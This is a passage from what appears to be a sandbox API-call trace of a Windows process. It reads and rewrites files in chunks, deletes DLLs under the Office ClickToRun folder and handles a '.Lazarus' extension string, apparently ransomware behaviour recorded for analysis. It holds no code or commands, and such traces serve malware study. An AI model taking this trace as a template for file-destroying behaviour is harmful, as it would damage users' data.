lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.486] GetLastError () returned 0x0 [0089.486] SetLastError (dwErrCode=0x0) [0089.486] GetLastError () returned 0x0 [0089.486] SetLastError (dwErrCode=0x0) [0089.486] GetLastError () returned 0x0 [0089.486] SetLastError (dwErrCode=0x0) [0089.486] GetLastError () returned 0x0 [0089.486] SetLastError (dwErrCode=0x0) [0089.486] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.486] WriteFile (in: hFile=0x360, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.487] GetLastError () returned 0x0 [0089.487] SetLastError (dwErrCode=0x0) [0089.487] GetLastError () returned 0x0 [0089.487] SetLastError (dwErrCode=0x0) [0089.487] GetLastError () returned 0x0 [0089.487] SetLastError (dwErrCode=0x0) [0089.487] GetLastError () returned 0x0 [0089.487] SetLastError (dwErrCode=0x0) [0089.487] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0xcc0, lpOverlapped=0x0) returned 1 [0089.487] WriteFile (in: hFile=0x360, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.487] GetLastError () returned 0x0 [0089.487] SetLastError (dwErrCode=0x0) [0089.488] GetLastError () returned 0x0 [0089.488] SetLastError (dwErrCode=0x0) [0089.488] GetLastError () returned 0x0 [0089.488] SetLastError (dwErrCode=0x0) [0089.488] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0089.488] GetLastError () returned 0x0 [0089.488] SetLastError (dwErrCode=0x0) [0089.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0089.488] WriteFile (in: hFile=0x360, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0xcc0, lpOverlapped=0x0) returned 1 [0089.488] GetLastError () returned 0x0 [0089.488] SetLastError (dwErrCode=0x0) [0089.488] GetLastError () returned 0x0 [0089.488] SetLastError (dwErrCode=0x0) [0089.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0089.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0089.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0089.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0089.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0089.489] CloseHandle (hObject=0x360) returned 1 [0089.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0089.490] CloseHandle (hObject=0x348) returned 1 [0089.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0089.490] AreFileApisANSI () returned 1 [0089.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0089.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x55f20 [0089.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 90 [0089.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0089.492] GetFileType (hFile=0x348) returned 0x1 [0089.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0089.492] GetLastError () returned 0xb7 [0089.492] SetLastError (dwErrCode=0xb7) [0089.492] WriteFile (in: hFile=0x348, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0089.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0089.493] CloseHandle (hObject=0x348) returned 1 [0089.493] AreFileApisANSI () returned 1 [0089.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0089.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x55f20 [0089.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 90 [0089.493] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll")) returned 1 [0089.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0089.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x570e0 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0089.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.495] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x58c0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-crt-convert-l1-1-0.dll", cAlternateFileName="APFD9C~1.DLL")) returned 1 [0089.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0089.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0089.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0089.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0089.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0089.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0089.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0089.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0089.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0089.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0089.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0089.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0089.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0089.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0089.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0089.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0089.496] AreFileApisANSI () returned 1 [0089.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 92 [0089.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0089.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0089.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0089.496] AreFileApisANSI () returned 1 [0089.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0089.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0089.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 92 [0089.496] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0089.497] GetFileType (hFile=0x348) returned 0x1 [0089.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.497] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0089.497] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0089.497] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0089.497] CloseHandle (hObject=0x348) returned 1 [0089.498] AreFileApisANSI () returned 1 [0089.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0089.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0089.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 92 [0089.498] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0089.498] GetFileType (hFile=0x348) returned 0x1 [0089.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.498] CloseHandle (hObject=0x348) returned 1 [0089.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0089.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0089.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0089.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0089.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0089.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0089.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0089.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0089.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0089.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0089.656] AreFileApisANSI () returned 1 [0089.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0089.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0089.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 92 [0089.703] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x58c0)) returned 1 [0089.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.703] AreFileApisANSI () returned 1 [0089.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0089.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0089.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0089.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0089.704] GetLastError () returned 0x0 [0089.704] SetLastError (dwErrCode=0x0) [0089.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3e8 [0089.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0089.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0089.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0089.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0089.704] GetLastError () returned 0x0 [0089.704] SetLastError (dwErrCode=0x0) [0089.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0089.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0089.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x5fe78 [0089.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0089.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0089.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0089.704] AreFileApisANSI () returned 1 [0089.704] MultiByteToWideChar (in: CodePage=0x0, 